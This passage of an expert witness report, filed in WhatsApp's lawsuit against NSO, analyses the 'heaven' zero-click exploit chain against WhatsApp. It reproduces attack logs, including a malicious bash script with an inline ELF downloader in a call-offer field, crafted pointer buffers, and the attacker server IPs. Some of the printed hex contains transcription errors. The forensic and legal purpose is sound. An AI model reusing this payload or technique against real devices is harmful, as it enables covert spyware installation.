54.  As the fourth step in the exploit chain, "heaven" was designed to exploit the same buffer overflow again, this time to overwrite certain pointers[43] in the Target Device's memory. The "heaven" malware sent a bandwidth estimation packet of an unexpectedly large size, overflowing the buffer on the Target Device, and resulting in unintended behavior by the Target Device's WhatsApp Client Application. In this instance, the packet sent by "heaven" was precisely and specifically crafted to overwrite a pointer to a certain area of memory such that it pointed to an area of memory slightly offset from the original area. The "heaven" malware was designed to repeat this process until the targeted WhatsApp Client Application returned to "heaven" a specific area of memory containing information which could be used to calculate the locations of code used by WhatsApp in the Target Device's memory, specifically the base address of libwhatsapp.so.

---

[43] In computing, a pointer is a variable which stores (or "points to") the memory address of a piece of data, such as a function or another variable.

Docusign Envelope ID: 5E56B0BD-3069-4B97-8A24-F852D98B4824
Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 25 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    16

55. On modern systems such as Android devices, due to an application security mechanism known as address space layout randomization ("ASLR"), the locations in memory of libraries such as libwhatsapp.so change each time the application using them is started. Their locations are unpredictable and are never intended to be disclosed to other users, as knowledge of a process's memory space layout could facilitate malicious code execution through a buffer overflow. As such, identification of memory addresses for libwhatsapp.so and its components was critical to the success of Defendants' exploit. The "heaven" malware leveraged the technique described above to transmit information necessary to identify the base address of libwhatsapp.so in memory back to Defendants' Servers so that they could access specific functions and data on the Target Device, ultimately in order to achieve the execution of the malicious code delivered earlier.



*Figure 1: I developed this graphic to visualize the layout of the WhatsApp Client Application, libwhatsapp.so, and "connecting_tone_desc" in the Target Device's memory. Note that the graphic is not to scale and memory addresses depicted therein are not directly representative of any actual memory addresses or memory offsets.*

**Step 5: Conversion to Group Call; Delivery of Malicious Capabilities Buffer**

56. Upon determining the location of libwhatsapp.so in memory, for the fifth step in the process, the "heaven" malware upgrades the WhatsApp VoIP call to a group call, by simulating another participant (i.e., a WhatsApp client and user account) also controlled by "heaven." Note that this stage of the exploit appears from the WhatsApp Servers' perspective as carried out by two individual WhatsApp accounts and Client Applications; based on Defendants' code and logging made available to me, however, these users are

Docusign Envelope ID: 5E56B0BD-8069-4B97-8A24-F852D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 26 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    17

simulated, their client Applications are not authentic, and their transmissions are all sent using the same malware.

57. Normally, when a conference call is initiated, I understand that each WhatsApp Client Application undergoes a standard procedure in which the Client shares a set of features it can support during the call, such as live video or high-definition sound. This set of features is typically shared in a standard format known as a capabilities buffer.

58. In this case, in place of a capabilities buffer "heaven" sent a precisely crafted set of malicious data to the other devices, specifically to the Target Device. Owing to the previous step in which "heaven" identified the position of libwhatsapp.so in the Target Device's memory, the "heaven" malware could now calculate the positions of various pieces of information and functions which could enable execution of the bash script inserted into memory as part of the second step. The structure of the malicious capabilities buffer sent by "heaven" included pointers to these pieces of information and functions. Note that the legitimate WhatsApp Client Application does not afford users the ability to insert arbitrary information in the outbound capabilities buffer.

**Step 6: Delivery of Second Malicious Capabilities Buffer**

59. Upon receiving the group call invitation message, the second attacker account controlled by "heaven" automatically sent a "pre-accept" message to join the call. As the sixth step in the process, the second attacker account sends another malicious capabilities buffer containing pointers to additional information required to achieve code execution on the Target Device. Both of the malicious capabilities buffers are temporarily stored in the Target Device's memory while the call was incoming, such that they could be processed by the WhatsApp Client Application under ordinary circumstances.

**Step 7: Hijacking of Callback Pointers**

60. As the seventh step, "heaven" is designed to exploit the critical buffer overflow vulnerability once again in order to achieve code execution on the Target Device. This was accomplished by overwriting two callback pointers[44] in the Target Device's memory such that they instead pointed to the memory address values set by the two simulated attackers in steps five and six. Normally, these pointers allow the WhatsApp software to proceed to its next operation (depending on user input or according to the software's design), such as answering a call or upgrading a voice call to a video call. By overwriting these pointers, "heaven" could induce the WhatsApp Client Application to execute

---

[44] A callback pointer is a pointer to a function which can be passed to another function, allowing that function to "call back" and execute the pointed-to function. By overwriting a callback pointer, an attacker can potentially modify the logic and execution flow of the program to induce unintended behavior.

functions specified by the addresses in the malicious capabilities buffers, which at this point were present in the Target Device's memory.

## Step 8: Call Termination and Compromise of Target Device

61.  At this point, "heaven" terminated both calls by sending a message to the WhatsApp Signaling Server before the victim could answer or decline; this eighth step in the process caused the victim's device to initiate the hijacked instructions carefully established in steps five through seven. Normally, when a call ends, the phone stops ringing, and certain operations are expected to occur, such as the content displayed on the phone reverting back to the home screen. However, due to the changes made by the "heaven" malware to values in the Target Device's memory, the end of the call triggered the modified pointers, resulting in the execution of the malicious bash script inserted during step two.

62.  Both callback pointers overwritten during step seven pointed to a legitimate function present within libwhatsapp.so, which was designed to read two parameters and a function pointer and subsequently execute that function by passing it the two parameters. The enumeration of the Target Device's memory, and manipulation of values stored therein, allowed "heaven" to leverage this function in order to induce the victim's WhatsApp Client Application to execute any function with any two parameters.

63.  The first callback operation triggered a routine function within the WhatsApp Client Application which organizes and resets certain parts of the application's memory. This action appears to have been an attempt to conceal evidence the attack. By resetting memory areas, the "heaven" malware made it less likely that the targeted user would notice that an attack had taken place; and furthermore made it such that in the event that the attack was detected by the victim or others, there would be less evidence available to reveal details of the exploit chain described in the preceding paragraphs. It is also likely that this action served in part to limit the risk of the WhatsApp Client crashing due to the presence of corrupted data in memory.

64.  The second callback operation led to the execution of a "popen" (pronounced "P-open") instruction referencing the "connecting_tone_desc" variable. A "popen" instruction opens a process by creating a pipe, forking, and invoking the shell, a process which is commonly used to execute shell commands to collect and analyze data from within a program. By invoking the "connecting_tone_desc" variable, the "popen" instruction executed the malicious bash script written to memory during the second step, resulting in control of the Target Device in the context of the WhatsApp Client Application.

65.  I note that all of the traffic generated by "heaven" up until this point was transmitted to the Target Device by way of the WhatsApp Signaling Servers and Relay Servers, and thus appeared to the victim's WhatsApp Client Application as legitimate WhatsApp traffic.

**Post-Exploitation of Target Device**

66. In this section, I detail how Defendants are able to compromise the Target Device and deliver additional software payloads to the Target Device following the successful exploitation of the WhatsApp vulnerability. In short, by this time, the Target Device is sufficiently compromised by Defendants such that Defendants could deploy additional software payloads to the device, such as Defendants' Pegasus Spyware. But for exploiting the WhatsApp vulnerability, it is unlikely that these additional payloads would have been able to be delivered to the Target Device without the target user's awareness.

67. Upon its execution by the compromised WhatsApp Client Application, Defendants' bash script from the "connecting_tone_desc" field first used the Android Activity Manager to stop a WhatsApp service called "VoiceFGService" if it was running on the device. The script then created an ELF (Executable and Linkable Format[45]) executable file in an inconspicuous location within the WhatsApp Client directory using inline binary data. This file is marked executable and executed; its output is redirected into a second file in the same directory, which then is itself executed, with four arguments each made up of eight hexadecimal characters. Both of the created files are subsequently deleted.

68. During my review of the malicious WhatsApp call offer messages[46] logged and made available to me by Plaintiffs, I identified 5,822 instances of an apparent malicious bash script present in the "connecting_tone_desc" field of a malformed call offer message. These scripts are highly similar to one another, and differ only in:

   - The binary content of their inline ELF payload; and
   - Three of the four hexadecimal arguments passed to the second-stage executable.

69. Of the 5,822 total malicious bash scripts observed within the relevant logs, I identified 2,371 unique scripts and corresponding unique sets of ELF payloads and hexadecimal arguments.

70. I examined the ELF payloads and determined that they are largely identical to one another. Upon being reverted to binary format, each is 181 bytes in length, and the files differ from one another only by eight bytes at offsets 0x8C through 0x93. I will refer to these bytes as the "variable bytes."

---

[45] Executable and Linkable Format (ELF) is a common standard file format for binary executables on Unix-like systems such as Linux and Android. It is roughly analogous to a Portable Executable (PE or "EXE") file on Windows systems.

[46] WA-NSO-00017581.

71. The variability of a small portion of the payload suggests uniformity in program logic across all samples, with a difference in one or more small variable(s) hard coded into the binary.

72. I determined that the first four variable bytes together constitute an IP address, with each byte corresponding to an "octet" of an IP address as written in a human-readable format.

73. The two bytes which precede the IP address represent a network port number, stored as a big-endian short integer.[47] These two bytes happen to be consistent (0xFF01) across all observed samples, and can be converted to the decimal number 65,281 (port 65281).

74. My understanding is that these small ELF payloads from the "connecting_tone_desc" bash script served to fetch a second-stage executable payload from a server controlled by Defendants, which would subsequently be executed by the bash script on the victim device. The IP addresses and port number contained within the ELF payloads constituted locations on the Internet where Defendants' Server could be reached, and from which the second-stage payload could be downloaded to the victim devices.

75. Between the 2,371 unique ELF payloads, I identified 42 unique IP addresses stored in the first four variable bytes.

76. One of these IP addresses, in human-readable format, is 104.223.76.220. This is the address of a third-party server owned by QuadraNet Enterprises LLC[48] and physically located in the U.S. state of California. This IP address was referenced in 1,724 of the 5,822 manipulated call offer messages which I reviewed from Plaintiffs' logging.

77. Another of these IP addresses, in human-readable format, is 54.93.81.200. This is the address of a third-party server owned by Amazon Web Services (AWS)[49] and physically located in Germany. In the past, that IP address has resolved to domain names linked to NSO, including subdomains of nsogroup.com. Based on records produced by AWS, the IP address 54.93.81.200 was registered to NSO Technologies Group Ltd. From December 6, 2018 through at least October 5, 2020, with an email address of it@nsogroup.com.[50] Defendants have acknowledged in the litigation that "Pegasus code, Python scripts, [and]

---

[47] A short integer is a type of computer data which is two bytes in length and represents a decimal integer between 0 and 65,535. "Big-endian" indicates that the byte containing the most significant value is stored first.

[48] https://whois.arin.net/rest/net/NET-104-223-0-0-1/pft?s=104.223.76.220.

[49] https://whois.arin.net/rest/net/NET-54-93-0-0-1/pft?s=54.93.81.200.

[50] WA-NSO-00017151.

Docusign Envelope ID: 5E56B0BD-3069-4B07-8A24-F352D98B4824   Case 4:19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 30 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   21

configuration files" were "formerly housed on the AWS Server by NSO's research and development department for some periods prior to January 2021."[51]

78. I have been provided with computer scripts, configuration files and logs, which I understand from Counsel were obtained by the U.S. Department of Justice from the AWS Server associated with IP address 54.93.81.200, which I will hereafter refer to as "Defendants' Server" or the "AWS Server." As discussed in further detail below, some of the logs from Defendants' Server overlap with the exploitative activity observed by Plaintiffs against WhatsApp users, Client Applications, and infrastructure, and I understand that computer scripts from that server would have served to run portions of the exploit process which I have described.

## EVIDENCE VALIDATION

79. In this section, I summarize the evidence from Defendants' Server that corroborates and validates the eight-step exploit chain described in the prior section.

**Step 1: Fingerprinting of Target Device**

80. I identified indicators of the fingerprinting activity during my review of the "abs.log"[52] file derived from Defendants' Server obtained by the DOJ. The log event provides the Target Device's "nuserAgent," "appVersion," "osVersion," "manufacturer," "device," "osBuildNumber," "phoneId," "localeLanguage," and "localeCountry."

329 [heaven:INFO] [CallerPlane] username: [REDACTED BY FBI]\\npassive: false\\nuserAgent {\\n platform: 0\\n appVersion {\\n primary: 2\\n secondary: 19\\n tertiary: 98\\n }\\n mcc: \\"425\\"\\n mnc: \\"003\\"\\n osVersion: \\"7.0\\"\\n manufacturer: \\"samsung\\"\\n device: \\"herolte\\"\\n osBuildNumber: \\"NRD90M.G930FXXU1DPLT\\"\\n phoneId: \\"11b7de12-a217-4e2c-a6a6-ad3a58e71343\\"\\n localeLanguageIso6391: \\"en\\"\\n localeCountryIso31661Alpha2: \\"GB\\"\\n}\\npushName: \\"Ttt\\"\\nshortConnect: true\\nconnectType: 111\\n}\\n2019-05-02 17:14:44

*Figure 2: Fingerprinting, "abs.log."*

81. I further identified evidence related to the fingerprinting stage, which occurs prior to the first voice call between Defendants and Target Device. Within the evidence provided by Plaintiffs, Defendants stated, "In order to get target's device OS details + WA client version, we need to send a fingerprint request. We do not want to skip this part since the exploit is WhatsApp-version-sensitive, and in case [sic] attack failed we want to know the reason for failure."[53] Defendants continued to discuss the fingerprinting request, which is defined below:

---

[51] Declaration of Chaim Gelfand in Supp. of Defs' Opp. to Mot. to Compel Discovery Regarding AWS Server ¶ 6-8) (July 12, 2024) (Dkt. No. 339-1).

[52] WA-NSO-00017151.

[53] NSO_WHATSAPP_00008960.

- Defendants maintained WhatsApp user accounts, in which they added a Target Device and its associated user into a group chat. This addition into the group chat triggered a request from the Target Device's WhatsApp Client Application, which was then sent to a legitimate WhatsApp Server.

- It is expected that this request is processed by the WhatsApp Server, which will then provide a response back to the Target Device.

- With this expected request and response, Defendants had their WhatsApp Client Application send a request, which mimicked a WhatsApp Server response to the legitimate WhatsApp Server. As a result, the legitimate WhatsApp Server is tricked into forwarding the forged response to the Target Device.

- The request sent by Defendants' WhatsApp Client is sent 40 times within a few milliseconds. This is due to the short time frame in which Defendants are attempting to "race" with the WhatsApp Server in sending a response back to the Target Device.

- The domain listed within the request sent by Defendants' WhatsApp Client takes advantage of a bug within WhatsApp's certificate validation process. Domains owned by Defendants used for the fingerprinting leverage certificates[54] that are signed with a single key, so it is trusted by the Target Device's WhatsApp Client.

**Step 2: Delivery of Malicious Call Offer to Target Device**

82. I identified evidence of manipulated call offer messages during my review of the "abs.log," which contain the two manipulated call settings reflected in the messages recorded in Plaintiffs' logs. An example is set forth in the figure below.

847 [heaven:INFO] [CallerPlane] [>] <call to=\'**********@s.whatsapp.net\' id=\'7F3ADB1EF8945FFE91163BDA7932F5BE\' ><offer call-id=\'3F79FFF7759D93FA1F1CB7861D31DC17\' call-creator=\'**********@s.whatsapp.net\' ><e caller_implicit_active=\'0\' /><encode sampling_rate=\'33256\' /><audio enc=\'opus\' rate=\'8000\' /><audio enc=\'opus\' rate=\'16000\' /><video enc=\'h.264\' orientation=\'1\' screen_width=\'1080\' screen_height=\'1920\' /><video enc=\'vp8/h.264\' orientation=\'1\' screen_width=\'1080\' screen_height=\'1920\' /><video enc=\'vp8\' orientation=\'1\' screen_width=\'1080\' screen_height=\'1920\' /><options media_pipeline_setup_wait_threshold_in_msec=\'0\' connecting_tone_desc=\'(w=com.whatsapp;t=/data/data/5w/files/t;e=echo;c=\\"chmod
777\\";g=grep;v=/system/bin/am;u=${which id>/dev/null && $e ${(`id | $g -oC \\"uid=[0-9]+\\" | $g -oC \\"[0-9]+\\"' / 100000)) || $e 0);cp $v ${t}p;s=\\"stopservice --user $u $w/.voipcalling.VoiceFGService;\\";$v $s || ${t}p $s;rm ${t}*;$e -en
\\"\\\\x7FELF\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x20\\\\x00\\\\x02\\\\x00\\\\x28\\\\x00\\\\x20\\\\x00\\\\x20\\\\x00\\\\x20\\\\x00\\\\x20
\\\\x00\\\\x04\\\\x00\\\\x00\\\\x00\\\\x19q\\\\x00\\\\xe3\\\\x00\\\\x20\\\\xb0\\\\xe34\\\\x00\\\\x20\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x12\\\\xc0\\\\x8f\\\\xe2\\\\x01\\\\
xc0\\\\x8c\\\\xe2\\\\x1c\\\\xff\\\\x2f\\\\xe1F0\\\\x00\\\\x00\\\\xdf\\\\x01D\\\\x12\\\\x1a\\\\xfa\\\\xd1pG\\\\x02\\\\x20\\\\x01\\\\x21\\\\x00\\\\xdf\\\\x06\\\\x00\\\\x027\\\\x
0f\\\\xf20\\\\x01\\\\x10\\\\x22\\\\x00\\\\xdf\\\\x04\\\\x27\\\\x00\\\\x08\\\\x00\\\\xdf\\\\x20\\\\xb4\\\\x04\\\\x22\\\\x03\\\\x27\\\\xff\\\\xf7\\\\xe7\\\\xff\\\\x04\\\\xbc\\\\
x15\\\\x00\\\\xad\\\\xeb\\\\x02\\\\x0d\\\\xff\\\\xf7\\\\xe1\\\\xff\\\\x04\\\\xx27\\\\x01\\\\x26\\\\x2a\\\\x00\\\\xff\\\\xf7\\\\xdc\\\\xff\\\\x01\\\\x27\\\\x00\\\\xdf\\\\x02\\\\x00\
\\\xff\\\\x016\\\\xcc8H1f8${t}z\\\\x00\\" >$t;$c $t;$t>${t}z;$c ${t}z;${t}z c8515d36 00001f93 699f5429 c8c974ce;rm ${t}*;}&%0%0%0%0%0\' /><net medium=\'3\' /><capability
ver=\'1\' >%01%03%F7%9F%03</capability></enc v=\'2\' type=\'pkmsg\'
>3%08%FD%F5%20%12%21%05.%CA%FB%29p%09%EE%3C%9Dk%0D%BB%98%EA%9A%7C%AE%C5%C7%84%DC%84%16%C1%08H%D5_%A6Z%8D%16%1A%21%05%A5%E5%92%2
4R%8A%7C%15%FF%5D2%0A%DC%CC%89%FD%E8%7F%5C%8D%B7q3%D1%F16%D9J%C6P%AA%90%7E%22b3%0A%21%05k%D1%1E%3Cx%DB%F7%06%3D%22%AE%01%2A%D1%
A4%88%DA%5D%18E%26%EFOx%F9%D1%22%7F%A3%E0%96%02%10%01%18%00%220%9EY%5B%3D%E4%95-
%16%E4%2A%B8%B2%3F%CD%3F%88%80_%7B%85%3B%FE%8F%ADJ%CD%92%15P%DBwB%FE%A0%11%D9%9FTg%FB%1F%CB%CA%03%AF%A30%C7n%EE%EA%21%98%F9%18%
CE%28%CF%96%FA%F0%040%01</enc><encopt keygen=\'2\' /><init_bwe delay_ms=\'1\' stop_probing_after_call_start=\'0\' bwe_clamp_scheme_after_call_start=\'1\'
max_iterations=\'1\' additional_iter_threshold=\'0\' byte_multiplier_per_iter=\'0\' bitrate_multiplier_per_iter=\'1\' need_higher_estimate_each_iter=\'0\' /></offer></call>\\n2019-05-
02 17:14:50

*Figure 3: Malformed call offer message, "abs.log."*

---

[54] Certificates in this context are used to validate the identity and authenticity of a device in order to mitigate "spoofing" or impersonation, ultimately to ensure a secure and private connection between clients.

83. As indicated in Figure 3 below, the manipulated call offer message from the "abs.log" has enabled the XOR cipher, which the WhatsApp Client Application cannot do.



*Figure 4: XOR encryption enablement in malformed call offer message, "abs.log."*

84. Within the manipulated call offer message, the first manipulated call setting is evidenced. This shows the XOR cipher being enabled.[55] Within the manipulated call offer message, the second manipulated call setting loaded a malicious bash script within the "connecting_tone_desc" field. Within the evidence provided by Plaintiffs, Defendants stated, "In order to attack we initiate a WhatsApp voice call with target. As part of the call – initiation handshake between our WIS client and target's WhatsApp client, we add to a specific field (property) of the message's request payload that is named 'relay servers' and usually contains 5 constant IP addresses of Relay Servers, 1 additional Relay Server. When a standard WhatsApp client initiates a voice call it goes out with 5 IP addresses. There is no validation of the number of IPs that are set there (however WhatsApp Server adds this field as part of the connection – initiation between two clients in case this field is empty). WhatsApp Servers override the first 5 servers with their own Relay Servers[.] We assign an RTT=0 value with these servers, leading the target's WA [WhatsApp] client to choose our 'relay' server instead of a real one."



*Figure 5: connecting_tone_desc field in malformed call offer message, "abs.log."*

**Step 3: Identification of Target Device Architecture**

85. I also identified evidence in the "abs.log" file from Defendants' Server of the next third step in the exploit observed on Plaintiffs' servers, in which Heaven determines whether the Target Device is using a "32-bit" or "64-bit" WhatsApp Client. The partial and redacted set of files from the AWS Server from the Department of Justice do not appear to contain

---

[55] XOR cipher is a type of encryption mechanism, in which the data encrypted by the XOR cipher cannot be decrypted without the key used to encrypt.

logs of the messages sent across Plaintiffs' Relay Servers to exploit the buffer overflow, which were used in the next steps of the attack. However, the logs contain the results of those steps, which confirm that they occurred.

86. For example, within the logs recorded on May 2, 2019, I identified five instances in which Defendants' exploit began to run, which can be seen by five separate "Response arrived" log events. "Responses" in network traffic are generated when receiving device responds to a server's request for information or an action to be performed.

| |
|---|
| {'resp_success': True |
| 'status': '200' |
| 'body': None |
| 'data': b'{"status": "Failed" |
| "status_code": "500" |
| "reason": "Exception occured" |

*Figure 6: First instance, Failed, "abs.log."*

87. One of these Responses has a "status" of "Succeeded," with a "reason" of "Exploit successfully completed," and a "cache" that states, "{\\"detect_remote_version\\": {\\"bitness\\": 64." The term "bitness" used in the "cache" field of this Response refers to the Target Device's architecture. In my opinion, this log reflects that the portion of the exploit chain that determines the Target Device's architecture ran successfully and determined that the Target Device is running a "64-bit" version of WhatsApp.

| |
|---|
| {'resp_success': True |
| 'status': '200' |
| 'body': None |
| 'data': b'{"status": "Succeeded" |
| "status_code": "200" |
| "reason": "Exploit successfully completed" |
| "action": 0 |
| "actionInfo": 0 |
| "result": {"is_android": "1" |
| "cache": "{\\"detect_remote_version\\": {\\"bitness\\": 64 |

*Figure 7: Second instance, Succeeded, "bitness," "abs.log."*

### Step 4: Memory Information Disclosure

88. The "abs.log" file also evidences the fourth step of the exploit observed by Plaintiffs, in which Heaven overflows the Target Device's buffer to expose the address for libwhatsapp.so. While the buffering messages are not recorded in the AWS Server files

Docusign Envelope ID: 5E56B0B0-8069-4B97-8A21-F353D98B4824
Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 34 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   25

made available to me, the "abs.log" file records that the exploit resulted in the "LEAKED ADDR" for "libwhatsapp_addr" (i.e., the address of libwhatsapp.so in the Target Device's memory) in each instance of a successful attack by "heaven" against a WhatsApp user.

```
[heaven:INFO] *******************************
[heaven:INFO] LEAKED ADDR: pool_pfn_callback_addr: 0x0000007a5751a524
[heaven:INFO] LEAKED ADDR: libwhatsapp_addr: 0x0000007a57294000
[heaven:INFO] *******************************
```

*Figure 8: Leaked address, "abs.log."*

**Step 5: Conversion to Group Call; Delivery of Malicious Capabilities Buffer**

89. In the next step of the exploit, Defendant utilized two phone numbers ("Phone A" and "Phone B") to convert the call to a group video call. After initiating the call with Phone A, Defendant invited Phone B to join the call, which provides the "capability_bit_mask" buffer. Ordinarily, this buffer describes all the VoIP capabilities it supports, but in the exploit, Defendants' Malware sends a modified bitmask buffer using the buffer memory layout and full pointer values gleaned from the Target Device.

90. The "abs.log" file indicates that the part of the attack involves adding another attacker account through a group call and the log contains evidence of the initial capabilities buffer sent to the second account.

2019-02-21 19:13:46,108 [heaven:INFO] [CallerPlane] [>] <call to='**********@s.whatsapp.net' id='811CFB508AB4BEAC187E989D9F9024' ><offer call-
id='70A2B42EC236131D1D7C79045F642F' call-creator='**********@s.whatsapp.net' ><options /><audio enc='opus' rate='8000' /><audio enc='opus' rate='16000'
/><video enc='h.264' orientation='1' screen_width='1080' screen_height='1794' /><video enc='vp8' orientation='1' screen_width='1080' screen_height='1794' /><video
enc='vp8/h.264' orientation='1' screen_width='1080' screen_height='1794' /><net medium='1' /><capability ver='1' >%01%03%F7%9F%03</capability><enc v='2'
type='pkmsg'
>3%08%C0%AB4%12%21%05%A9%29%B1%2F0%DB%AD%01%E1%DB8%8E%17%22N%EF%9O%CF%B0Zh%29z%0F.%88%2C%D1%DD%16%26u%1A%21%053%CA%FC%1A
4F%88%2F.%8F%87%2F%3A%7C%B9%8A%E4%D8%02%0C%92%B7%D1%ED%C2%14v%07%D5%98%3A_%22b3%0A%21%05%94%E6%80%03%DBL%0A%7D%DC4t%25G%
BA%E8%9A%FC%EFh%3BZsF%1B%BF%8Bm%Y%FDZ%60%10%02%18%00%220%04%F8X%E8%14%95%7E%18h%18%91k%16%B1%10g%0F%B9%21%B9%DC%7F%DDVc%A
0n%F2%83%A3%21%A3%0C%EB%B9d%92%FB%AF%9C%F4%86%165%5E%01n37UEj2%94%13%24%28%F0%C2%D8%B3%020%0O</enc><encopt keygen='2'
/><group_info ><participant jid='**********@s.whatsapp.net' >capability ver='1'
>%01%8%00%00%7C%ED%3W>%00%00%00H%94LW>%00%00%00%00%09%2CW>%00%00%00%00%CC%88%80W>%00%00%00%09%E0%E0%3W>%00%00%00%A4%A4%A4H
%94LW>%00%00%00%00%00%00%00</capability></participant><participant jid='**********@s.whatsapp.net' ><capability ver='1'
>%01%03%F7%9F%03</capability></participant></group_info></offer></call>

*Figure 9: Initial capabilities buffer in "abs.log."*

**Step 6: Delivery of Second Malicious Capabilities Buffer**

91. As stated in Step 5, the voice call is converted into a group voice call including an additional participant controlled by Defendants. This secondary participant then sends a secondary capabilities buffer following inclusion into the group video call.

92. The "abs.log" also records the second malicious capabilities buffer sent by the second attacker account added in Step 5. Notably, the second message is returned less than one

Docusign Envelope ID: 5E56B0BD-3069-4B97-8A24-F352D98B4824
Case 4.19-cv-07123-PJH   Document 514-2   Filed 01/09/25   Page 35 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef   26

second later, confirming that this process is automated and part of the exploit chain, and not the introduction of an independent second actor.

2019-02-21 19:13:46,436 [heaven:INFO] [CallerPlane] [<] <call from='70A2B42EC236131D1D7C79045F642F@call' id='3756608595' t='1550776426' ><group_update
call-creator='*********@s.whatsapp.net' call-id='70A2B42EC236131D1D7C79045F642F' ><group_info call-creator='*********@s.whatsapp.net' call-
id='70A2B42EC236131D1D7C79045F642F' transaction-id='7' media='video' ><participant jid='*********@s.whatsapp.net' state='receipt' ><capability ver='1'
>%01%2C%00%00%A0%FD%82Wz%00%00%00%A5%A5%A5%A5%A5%A5%A5%EB%18GWz%00%00%00i%2A%B0Wz%00%00%00%A5%A5%A5%A5%A5%A5%A5%
A4%A4%A4%A4</capability></participant><participant jid='*********@s.whatsapp.net' state='connected' ><capability ver='1'
>%018%00%00%7C%FD%82Wz%00%00%00H%94LWz%00%00%00%009%2CWz%00%00%00%CC%88%80Wz%00%00%00%E0%FD%82Wz%00%00%00%A4%A4%A4%A4H
%94LWz%00%00%00r%00%00%00<</capability></participant><participant jid='*********@s.whatsapp.net' state='connected' ><capability ver='1'
>%01%03%E7%9F%03</capability></participant></group_info></call>

*Figure 10: Secondary malicious capabilities buffer within "abs.log."*

### Step 7 & 8: Call Termination and Compromise of Target Device

93.  As noted previously, the partial set of files from the AWS Server do not record the buffering messages over Plaintiffs' Relay Servers, such as those used in Step 7 to overwrite the pointers, but the "abs.log" file does record the identified indicators of voice call being terminated shortly after completing the steps above and before the call is answered.

[heaven:INFO] [inviteePlane] [>] <call to='*********@s.whatsapp.net' id='B33C70F9945F9E7854D859F55115D356' ><terminate call-id='D91EF9BB1CD9BB959073F634F0FFD470' videostate='0' reason='timeout' /></call>
[heaven:INFO] [inviteePlane] [>] b'00f806ecf1b3faff06*********9b4afb10b33c70f9945f9e7854db59f55115d356f801f807ecf8ecf0fb10d91ef9bb1cd9bb959073f634f0ffd470f0c0a766964656f7374617465ff810f8bb0'
[heaven:INFO] Call b'D91EF9BB1CD9BB959073F634F0FFD470' was loud for 14.415701 seconds
[heaven:INFO] STING: pop2.html?key=1556817482988_300_90&n=14.415700912475586
[heaven:INFO] [inviteePlane] [<] <ack from='*********@s.whatsapp.net' class='call' type='terminate' id='B33C70F9945F9E7854D859F55115D356' />
[heaven:INFO] [inviteePlane] [<] b'00f809043ffaff06*********9bd8ecf1b5ecf84afb10b33c70f9945f9e7854db59f55115d356'
[heaven:INFO] [inviteePlane] Received terminate ack

*Figure 11: Call termination within abs.log.*

94.  In the figure above, after terminating the call, the log records that the "Call . . . was loud for 14.415701 seconds," which demonstrates Defendants' focus on stealth, and is consistent with the call termination marking the end of a covert zero-click exploit intended to be executed before the Target Device can accept the call.

# DETAILED OPINIONS

## Defendant's Exploitation of WhatsApp Infrastructure

### Defendants' WhatsApp User Registration and Extraction of Region Token

95.  For Defendants' "heaven" malware to successfully interact with WhatsApp's Signaling and Relay Servers and carry out their exploit chain, "heaven" must appear to these servers as a legitimate WhatsApp user or users operating the official WhatsApp Client. In my opinion, Defendants had to create WhatsApp user accounts and extract the Region Token to enable their Malware to gain access to WhatsApp's Servers and carry out their attack.

96.  There are certain steps which must be completed before an individual can successfully register and subsequently utilize the WhatsApp services. This includes the user's acceptance of WhatsApp's Terms of Service, which must be done before completing the WhatsApp registration process. Only once the sign-up process has been completed can

Docusign Envelope ID: 5E56B0BD-3069-4B07-8A24-F353D98B4824    Case 4:19-cv-07123-PJH    Document 514-2    Filed 01/09/25    Page 36 of 59

HIGHLY CONFIDENTIAL – ATTORNEYS EYES ONLY | Expert Witness Opinion of David Youssef    27

the user access the WhatsApp services and the full functionality of the WhatsApp Client Application.

97. According to the deposition transcript of Claudiu Gheorghe, the registration process results in the creation of a Region Token, which informs the process through which the WhatsApp Servers attempt to assign requests from the account to the applicable geographical region. It is my understanding that neither the Signaling Server nor the Relay Server will begin communication without being provided with a valid Region Token.[56]

98. The programs found on Defendants' AWS Server do not contain any functionality to "forge" a WhatsApp Region Token. Therefore, it is my opinion Defendants must have created at least two WhatsApp user accounts and extracted the Region Tokens assigned to those accounts in order to use them with their Malware. Defendants then extracted the WhatsApp Client Region Tokens assigned to those accounts in order to use them as part of their "heaven" application.

99. In my opinion, by extracting the Region Tokens, "heaven" was configured to emulate the official WhatsApp Client from the perspective of the WhatsApp Signaling and Relay Servers. As a result, Defendants were able to make their Malware appear to the WhatsApp Servers as a legitimate WhatsApp user or users operating the WhatsApp Client.

**Defendants' Engineered Malware to Access and Exploit WhatsApp Servers and Target Devices**

100. In my opinion, Defendants' "heaven" malware is designed to interface with WhatsApp's Client Applications and Servers to successfully achieve remote code execution on the Target Device by camouflaging manipulated voice call messages as legitimate messages from a user running the WhatsApp Client Application.

101. In fact, Defendants were not using the official WhatsApp Client Application to carry out the exploit. The official WhatsApp Client does not enable users to create the types of malformed messages intrinsic to the exploit. In place of a genuine WhatsApp Client Application, Defendants designed and used their own system, a component of "heaven" referred to internally by Defendants as the "WhatsApp Installation Service" or "WIS,"[57] to emulate the official WhatsApp Client and send messages to the Target Device via the WhatsApp Signaling and Relay Servers, using authentication credentials taken from a registered WhatsApp Client to gain access to the servers.

---

[56] Gheorghe Dep. at 94:6-95:12.

[57] NSO_WHATSAPP_00008957.

102. As acknowledged by Defendants, their illegitimate client does not behave like a typical WhatsApp user; Defendants' illegitimate client instead "only sends very specific messages (call messages \ text messages)."[58]

103. Defendants' Malware was also designed to enable XOR encryption and insert a malicious bash script within the RTCP packet's "connecting_tone_desc" field, resulting in a malformed call offer message that the WhatsApp Client Application cannot create. Because Defendants' extraction of the registration token caused the Malware's messages to appear as if they came from the WhatsApp Client Application, this malformed message, which contains a malicious bash script, was then delivered to the Target Device.

